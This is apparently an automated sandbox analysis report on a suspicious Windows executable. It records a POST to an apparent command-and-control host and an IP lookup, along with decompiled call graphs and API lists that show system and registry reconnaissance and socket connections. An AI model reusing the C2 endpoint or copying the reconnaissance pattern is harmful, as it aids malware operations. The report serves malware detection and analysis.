                                                            Dec 27, 2024 15:06:01.943034887 CET | 171 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "0", "data": "Done1" }
                                                            Dec 27, 2024 15:06:03.546766996 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 27 Dec 2024 14:06:03 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 207
                                                            Connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.7 | 49700 | 34.226.108.155 | 443 | 6528 | C:\Users\user\Desktop\5KwhHEdmM4.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-27 14:05:52 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
                                                            2024-12-27 14:05:53 UTC | 224 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 27 Dec 2024 14:05:53 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
                                                            2024-12-27 14:05:53 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                            Data Ascii: { "origin": "8.46.123.189"}



                                                            Target ID:0
                                                            Start time:09:05:47
                                                            Start date:27/12/2024
                                                            Path:C:\Users\user\Desktop\5KwhHEdmM4.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\5KwhHEdmM4.exe"
                                                            Imagebase:0xd90000
                                                            File size:4'488'704 bytes
                                                            MD5 hash:0C9FC2B51C7C604FD0BD9789F344CB95
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:2%
                                                              Dynamic/Decrypted Code Coverage:1.9%
                                                              Signature Coverage:12.2%
                                                              Total number of Nodes:572
                                                              Total number of Limit Nodes:97
                                                              execution_graph 81254 da1139 81279 dcbaa0 81254->81279 81256 da1148 81257 da1512 81256->81257 81263 da1161 81256->81263 81264 da1527 81257->81264 81285 d9fec0 11 API calls 81257->81285 81259 da0f69 81260 da1f58 81259->81260 81261 da1fb0 81259->81261 81268 da0f00 81259->81268 81287 da0150 localeconv localeconv 81260->81287 81261->81268 81289 da4940 localeconv localeconv 81261->81289 81263->81259 81284 da0150 localeconv localeconv 81263->81284 81264->81259 81286 da22d0 11 API calls 81264->81286 81272 da0f21 81268->81272 81283 da0150 localeconv localeconv 81268->81283 81270 da1f61 81271 da1fa6 81270->81271 81288 dcd4d0 7 API calls 81270->81288 81271->81268 81271->81272 81273 d975a0 2 API calls 81271->81273 81278 da208a 81271->81278 81275 da2057 81273->81275 81277 d975a0 2 API calls 81275->81277 81277->81278 81290 da3900 localeconv localeconv 81278->81290 81280 dcbb60 81279->81280 81281 dcbac7 81279->81281 81280->81256 81281->81280 81291 db05b0 localeconv localeconv 81281->81291 81283->81272 81284->81259 81285->81264 81286->81259 81287->81270 81288->81271 81289->81271 81290->81268 81291->81280 80668 d9255d 80688 1119f70 80668->80688 80671 d92589 80672 d925a0 GlobalMemoryStatusEx 80671->80672 80673 d925ec 80672->80673 80690 727032e 80673->80690 80694 727031c 80673->80694 80698 7270224 80673->80698 80689 d9256c GetSystemInfo 80688->80689 80689->80671 80691 7270357 GetLogicalDrives 80690->80691 80693 7270423 80691->80693 80695 727033c GetLogicalDrives 80694->80695 80697 7270423 80695->80697 80699 727023c 80698->80699 80700 727031c GetLogicalDrives 80699->80700 80701 727030d GetLogicalDrives 80700->80701 80703 7270423 80701->80703 80704 e44720 80708 e44728 80704->80708 80705 e44733 80707 e44774 80708->80705 80715 e4476c 80708->80715 80720 e45540 7 API calls 80708->80720 80710 e4482e 80710->80715 80721 e49270 80710->80721 80712 e44860 80726 e44950 80712->80726 80714 e44878 80715->80714 80716 e430a0 80715->80716 
80717 e431bc 80716->80717 80718 e430b0 80716->80718 80717->80707 80718->80717 80734 e43320 80718->80734 80720->80710 80739 e4a440 80721->80739 80723 e49297 80725 e492ab 80723->80725 80772 e4bbe0 7 API calls 80723->80772 80725->80712 80727 e44966 80726->80727 80731 e449c5 80727->80731 80733 e449b9 80727->80733 80774 e4b590 if_indextoname 80727->80774 80729 e44aa0 gethostname 80729->80731 80729->80733 80730 e44a3e 80730->80731 80775 e4bbe0 7 API calls 80730->80775 80731->80715 80733->80729 80733->80731 80737 e43332 80734->80737 80735 e433a9 80735->80717 80737->80735 80738 e59440 7 API calls 80737->80738 80738->80737 80740 e4a46b 80739->80740 80741 e4a4db 80740->80741 80768 e4d190 localeconv localeconv 80740->80768 80769 e4b180 localeconv localeconv 80740->80769 80770 e4a520 80740->80770 80742 e4aa03 RegOpenKeyExA 80741->80742 80752 e4ad14 80741->80752 80743 e4aa27 RegQueryValueExA 80742->80743 80744 e4ab70 RegOpenKeyExA 80742->80744 80745 e4aa71 80743->80745 80746 e4aacc RegQueryValueExA 80743->80746 80747 e4ac34 RegOpenKeyExA 80744->80747 80748 e4ab90 80744->80748 80745->80746 80755 e4aa85 RegQueryValueExA 80745->80755 80750 e4ab66 RegCloseKey 80746->80750 80751 e4ab0e 80746->80751 80749 e4acf8 RegOpenKeyExA 80747->80749 80767 e4ac54 80747->80767 80748->80747 80749->80752 80753 e4ad56 RegEnumKeyExA 80749->80753 80750->80744 80751->80750 80757 e4ab1e RegQueryValueExA 80751->80757 80752->80723 80753->80752 80754 e4ad9b 80753->80754 80756 e4ae16 RegOpenKeyExA 80754->80756 80760 e4aab3 80755->80760 80758 e4ae34 RegQueryValueExA 80756->80758 80759 e4addf RegEnumKeyExA 80756->80759 80763 e4ab4c 80757->80763 80761 e4af43 RegQueryValueExA 80758->80761 80771 e4adaa 80758->80771 80759->80752 80759->80756 80760->80746 80762 e4b052 RegQueryValueExA 80761->80762 80761->80771 80765 e4adc7 RegCloseKey 80762->80765 80762->80771 80763->80750 80765->80759 80766 e4afa0 RegQueryValueExA 80766->80771 80767->80749 80768->80740 80769->80740 80770->80741 80773 e4b830 if_indextoname 
80770->80773 80771->80761 80771->80762 80771->80765 80771->80766 80772->80725 80773->80741 80774->80730 80775->80733 81292 e43c00 81293 e43c23 81292->81293 81295 e43c0d 81292->81295 81293->81295 81296 e5b180 81293->81296 81299 e5b19b 81296->81299 81300 e5b2e3 81296->81300 81299->81300 81301 e5b2a9 getsockname 81299->81301 81302 e5b020 closesocket 81299->81302 81304 e5af30 81299->81304 81308 e5b060 81299->81308 81300->81295 81313 e5b020 81301->81313 81302->81299 81305 e5af63 socket 81304->81305 81306 e5af4c 81304->81306 81305->81299 81306->81305 81307 e5af52 81306->81307 81307->81299 81312 e5b080 81308->81312 81309 e5b0b0 connect 81310 e5b0bf WSAGetLastError 81309->81310 81311 e5b0ea 81310->81311 81310->81312 81311->81299 81312->81309 81312->81310 81312->81311 81314 e5b052 81313->81314 81315 e5b029 81313->81315 81314->81299 81316 e5b04b closesocket 81315->81316 81317 e5b03e 81315->81317 81316->81314 81317->81299 81318 e5a080 81321 e59740 81318->81321 81320 e5a09b 81322 e59780 81321->81322 81328 e5975d 81321->81328 81323 e59925 RegOpenKeyExA 81322->81323 81322->81328 81324 e5995a RegQueryValueExA 81323->81324 81327 e59812 81323->81327 81325 e59986 RegCloseKey 81324->81325 81325->81328 81327->81320 81328->81327 81329 e4d190 localeconv localeconv 81328->81329 81329->81328 81330 d929ff FindFirstFileA 81331 d92a31 81330->81331 81332 d92a5c RegOpenKeyExA 81331->81332 81333 d92a93 81332->81333 81334 d92ade CharUpperA 81333->81334 81336 d92b0a 81334->81336 81335 d92bf9 QueryFullProcessImageNameA 81337 d92c3b CloseHandle 81335->81337 81336->81335 81339 d92c64 81337->81339 81338 d92df1 CloseHandle 81340 d92e23 81338->81340 81339->81338 80776 d93d5e 80781 d93d30 80776->80781 80777 d93d90 80785 d9fcb0 11 API calls 80777->80785 80780 d93dc1 80781->80776 80781->80777 80782 da0ab0 80781->80782 80786 da05b0 80782->80786 80785->80780 80787 da07c7 80786->80787 80793 da05bd 80786->80793 80787->80781 80788 da066a 80805 dcdec0 80788->80805 80792 da067b 80798 da06f0 80792->80798 80801 
da07ce 80792->80801 80812 da73b0 localeconv localeconv 80792->80812 80793->80787 80793->80788 80793->80801 80810 da03c0 localeconv localeconv 80793->80810 80811 da7450 localeconv localeconv 80793->80811 80794 da07ef 80794->80801 80804 da0847 80794->80804 80825 da6fa0 80794->80825 80797 da0707 WSAEventSelect 80797->80798 80797->80801 80798->80794 80798->80797 80813 d976a0 80798->80813 80824 da7380 localeconv localeconv 80801->80824 80802 da09e8 WSAEnumNetworkEvents 80803 da09d0 WSAEventSelect 80802->80803 80802->80804 80803->80802 80803->80804 80804->80801 80804->80802 80804->80803 80806 dcdf1e 80805->80806 80807 dcdece 80805->80807 80833 dcdf30 80807->80833 80809 dcdef9 80809->80792 80810->80793 80811->80793 80812->80792 80814 d976c0 80813->80814 80815 d976e6 send 80813->80815 80814->80815 80816 d976c9 80814->80816 80818 d976d3 80815->80818 80820 d97704 80815->80820 80817 d9770b 80816->80817 80816->80818 80842 d972a0 localeconv localeconv 80817->80842 80841 d972a0 localeconv localeconv 80818->80841 80820->80798 80822 d9771c 80843 d9cb20 localeconv localeconv 80822->80843 80824->80787 80826 da6feb 80825->80826 80827 da6fd4 80825->80827 80826->80804 80827->80826 80828 da7207 select 80827->80828 80828->80826 80832 da7233 80828->80832 80829 da726b __WSAFDIsSet 80830 da729a __WSAFDIsSet 80829->80830 80829->80832 80831 da72ba __WSAFDIsSet 80830->80831 80830->80832 80831->80832 80832->80826 80832->80829 80832->80830 80832->80831 80837 dcdf44 80833->80837 80834 dcdfb5 80834->80809 80836 dcdfb9 80840 da7380 localeconv localeconv 80836->80840 80837->80834 80837->80836 80839 da7450 localeconv localeconv 80837->80839 80839->80837 80840->80834 80841->80820 80842->80822 80843->80820 80844 dc8b50 80845 dc8b6b 80844->80845 80873 dc8be6 80844->80873 80846 dc8b8f 80845->80846 80847 dc8bf3 80845->80847 80845->80873 80948 da6e40 select __WSAFDIsSet __WSAFDIsSet __WSAFDIsSet 80846->80948 80877 dca550 80847->80877 80851 dc8ba1 80852 dc8cd9 SleepEx getsockopt 80851->80852 80860 dc8cb2 
80851->80860 80864 dc8bb5 80851->80864 80857 dc8d18 80852->80857 80853 dc8e85 80859 dc8eae 80853->80859 80853->80873 80954 da2a00 localeconv localeconv 80853->80954 80854 dca150 3 API calls 80866 dc8dff 80854->80866 80855 dc8c1f connect 80856 dc8c35 80855->80856 80936 dca150 80856->80936 80858 dc8d43 80857->80858 80857->80860 80865 dca150 3 API calls 80858->80865 80859->80873 80955 d978b0 closesocket 80859->80955 80860->80853 80860->80854 80860->80873 80864->80873 80950 dd50a0 localeconv localeconv 80864->80950 80865->80864 80866->80853 80952 dad090 localeconv localeconv 80866->80952 80867 dc8c8b 80867->80851 80870 dc8dc8 80867->80870 80951 dcb100 localeconv localeconv 80870->80951 80871 dc8e67 80953 dd4fd0 localeconv localeconv 80871->80953 80878 dca575 80877->80878 80881 dca597 80878->80881 80959 d975e0 80878->80959 80880 dca6d9 80883 dca709 80880->80883 80893 dca713 80880->80893 80983 da2a00 localeconv localeconv 80880->80983 80881->80880 80971 dcef30 80881->80971 80885 d978b0 3 API calls 80883->80885 80883->80893 80885->80893 80886 dc8bfc 80886->80855 80886->80856 80886->80860 80886->80873 80888 dca7e5 80892 dca811 setsockopt 80888->80892 80898 dca87c 80888->80898 80908 dca8ee 80888->80908 80889 dca641 80889->80888 80985 dd4fd0 localeconv localeconv 80889->80985 80892->80898 80900 dca83b 80892->80900 80893->80886 80984 dd50a0 localeconv localeconv 80893->80984 80894 dca69b 80981 dad090 localeconv localeconv 80894->80981 80896 dca6c9 80982 dd4f40 localeconv localeconv 80896->80982 80898->80908 80988 dcb1e0 localeconv localeconv 80898->80988 80900->80898 80986 dad090 localeconv localeconv 80900->80986 80903 dcaf56 80903->80880 80904 dcaf5d 80903->80904 80904->80893 80907 dca150 3 API calls 80904->80907 80905 dca86d 80987 dd4fd0 localeconv localeconv 80905->80987 80907->80893 80908->80880 80909 dcabb9 80908->80909 80911 dcacb8 80908->80911 80912 dcae32 80908->80912 80918 dcabe1 80908->80918 80920 dcaf33 80908->80920 80914 dcad45 80909->80914 80909->80918 80925 
dcade6 80909->80925 80990 dc6be0 15 API calls 80909->80990 80910 dcb056 80999 dad090 localeconv localeconv 80910->80999 80911->80880 80911->80909 80928 dcacdc 80911->80928 80912->80909 80996 dd4fd0 localeconv localeconv 80912->80996 80913 dcaf03 80913->80920 80997 dd4fd0 localeconv localeconv 80913->80997 80919 dcad5f 80914->80919 80914->80925 80918->80880 80918->80910 80918->80913 80998 dd4fd0 localeconv localeconv 80918->80998 80991 de20d0 localeconv localeconv 80919->80991 80980 df67e0 ioctlsocket 80920->80980 80924 dcb07b 81000 dd4f40 localeconv localeconv 80924->81000 80994 dad090 localeconv localeconv 80925->80994 80926 dcad7b 80929 dcadb7 80926->80929 80992 dd4fd0 localeconv localeconv 80926->80992 80989 dad090 localeconv localeconv 80928->80989 80993 de3030 localeconv localeconv 80929->80993 80933 dcad01 80995 dd4f40 localeconv localeconv 80933->80995 80937 dca15f 80936->80937 80938 dc8c4d 80936->80938 80937->80938 80939 dca181 getsockname 80937->80939 80938->80867 80949 dd50a0 localeconv localeconv 80938->80949 80940 dca1f7 80939->80940 80941 dca1d0 80939->80941 80942 dcef30 2 API calls 80940->80942 81007 dad090 localeconv localeconv 80941->81007 80945 dca20f 80942->80945 80945->80938 81008 dad090 localeconv localeconv 80945->81008 80947 dca1eb 81009 dd4f40 localeconv localeconv 80947->81009 80948->80851 80949->80867 80950->80873 80951->80860 80952->80871 80953->80853 80954->80859 80956 d978d7 80955->80956 80957 d978c5 80955->80957 80956->80873 81010 d972a0 localeconv localeconv 80957->81010 80960 d975ef 80959->80960 80961 d97607 socket 80959->80961 80960->80961 80964 d97601 80960->80964 80965 d97643 80960->80965 80962 d9762b 80961->80962 80963 d9763a 80961->80963 81001 d972a0 localeconv localeconv 80962->81001 80963->80881 80964->80961 81002 d972a0 localeconv localeconv 80965->81002 80968 d97654 81003 d9cb20 localeconv localeconv 80968->81003 80970 d97674 80970->80881 80972 dcefa8 80971->80972 80973 dcef47 80971->80973 80979 dca63a 80972->80979 81006 
d9c960 localeconv localeconv 80972->81006 80974 dcef4c 80973->80974 80975 dcef81 80973->80975 80974->80979 81004 df3d10 localeconv localeconv 80974->81004 81005 df3d10 localeconv localeconv 80975->81005 80979->80889 80979->80894 80980->80903 80981->80896 80982->80880 80983->80883 80984->80886 80985->80888 80986->80905 80987->80898 80988->80908 80989->80933 80990->80914 80991->80926 80992->80929 80993->80918 80994->80933 80995->80880 80996->80909 80997->80920 80998->80918 80999->80924 81000->80880 81001->80963 81002->80968 81003->80970 81004->80979 81005->80979 81006->80979 81007->80947 81008->80947 81009->80938 81010->80956 81341 dc95b0 81342 dc95c8 81341->81342 81343 dc95fd 81341->81343 81342->81343 81344 dca150 3 API calls 81342->81344 81344->81343 81345 dc6ab0 81347 dc6ad5 81345->81347 81346 dc6bb4 81348 e45ed0 11 API calls 81346->81348 81347->81346 81349 da6fa0 4 API calls 81347->81349 81350 dc6ba9 81348->81350 81351 dc6b54 81349->81351 81351->81346 81351->81350 81352 dc6b5d 81351->81352 81352->81350 81354 e45ed0 81352->81354 81357 e45a50 81354->81357 81356 e45ee5 81356->81352 81358 e45a58 81357->81358 81363 e45ea0 81357->81363 81359 e45b50 81358->81359 81372 e45a99 81358->81372 81373 e45b88 81358->81373 81364 e45eb4 81359->81364 81365 e45b7a 81359->81365 81359->81373 81360 e45e96 81398 e59480 7 API calls 81360->81398 81363->81356 81399 e46f10 7 API calls 81364->81399 81384 e470a0 81365->81384 81369 e45ec2 81369->81369 81370 e45be2 __WSAFDIsSet 81370->81372 81371 e45da1 __WSAFDIsSet 81378 e45cae 81371->81378 81372->81370 81372->81373 81375 e470a0 8 API calls 81372->81375 81393 e46f10 7 API calls 81372->81393 81373->81378 81394 e46d50 localeconv localeconv 81373->81394 81395 e45ef0 6 API calls 81373->81395 81375->81372 81378->81360 81378->81371 81380 e5a920 81378->81380 81396 e46d50 localeconv localeconv 81378->81396 81397 e59320 7 API calls 81378->81397 81381 e5a944 81380->81381 81382 e5a94b 81381->81382 81383 e5a977 send 81381->81383 81382->81378 81383->81378 
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                              • API String ID: 0-1590685507
                                                              • Opcode ID: 73313f3818f1d998f1379cb9ef1bbaa04e0bdbf26de5a2b92d8e4f3e7165fac4
                                                              • Instruction ID: 49af10239589ae05f2a75953827b8c7322d997c79791afaadc76953566643fb3
                                                              • Opcode Fuzzy Hash: 73313f3818f1d998f1379cb9ef1bbaa04e0bdbf26de5a2b92d8e4f3e7165fac4
                                                              • Instruction Fuzzy Hash: ACC2B231A043459FD714CF29C484BAAB7E2FF84314F09866DEC999B362D771E984CBA1

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 00D92579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 00D925CC
                                                              • GetDriveTypeA.KERNELBASE ref: 00D92647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 00D9267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 00D927E2
                                                              • SHGetKnownFolderPath.SHELL32 ref: 00D9286D
                                                              • FindFirstFileW.KERNELBASE ref: 00D928F8
                                                              • FindNextFileW.KERNELBASE ref: 00D9291F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                                              • String ID: @$`
                                                              • API String ID: 2066228396-3318628307
                                                              • Opcode ID: 2872ac62c1561a0044e54a8b1d571655480e81267495a052ef8724c68b0ce8db
                                                              • Instruction ID: 2af60ab99fc297b3355d2cc56614f8b54dd1fee494daaca536f8d0dcc56858c3
                                                              • Opcode Fuzzy Hash: 2872ac62c1561a0044e54a8b1d571655480e81267495a052ef8724c68b0ce8db
                                                              • Instruction Fuzzy Hash: 53D1C7B49043199FCB10EF68C5946AEBBF4BF58348F00896DE898D7354E7349A84CF92

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: dac00043dd16b07d3d1f8bc8445f32386e0208a4ad73cca66e88023fedc2f56b
                                                              • Instruction ID: df035067fc61094cebc69a7d6427bc3fbba958b71fde37416599a6842e0e2d07
                                                              • Opcode Fuzzy Hash: dac00043dd16b07d3d1f8bc8445f32386e0208a4ad73cca66e88023fedc2f56b
                                                              • Instruction Fuzzy Hash: 38E1FBB49053059FDB10EF68D9946AEBBF8BF58348F108869E888D7354E734D988CF52

                                                              Control-flow Graph

                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00DA0711
                                                              • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00DA09DD
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00DA09FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: multi.c
                                                              • API String ID: 2170980988-214371023
                                                              • Opcode ID: a3f68753abe4e929fe907a5af65ed22936c1ae13716f8c574086371c3bcf403c
                                                              • Instruction ID: b43dffcbbd037e416ae5593317d2b74b4b608839ae96297191b56ec33b255786
                                                              • Opcode Fuzzy Hash: a3f68753abe4e929fe907a5af65ed22936c1ae13716f8c574086371c3bcf403c
                                                              • Instruction Fuzzy Hash: FFD1C3756083019FEB10DF64C881B6B7BE5FF96348F08882CF98596241E774E959CBB2

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
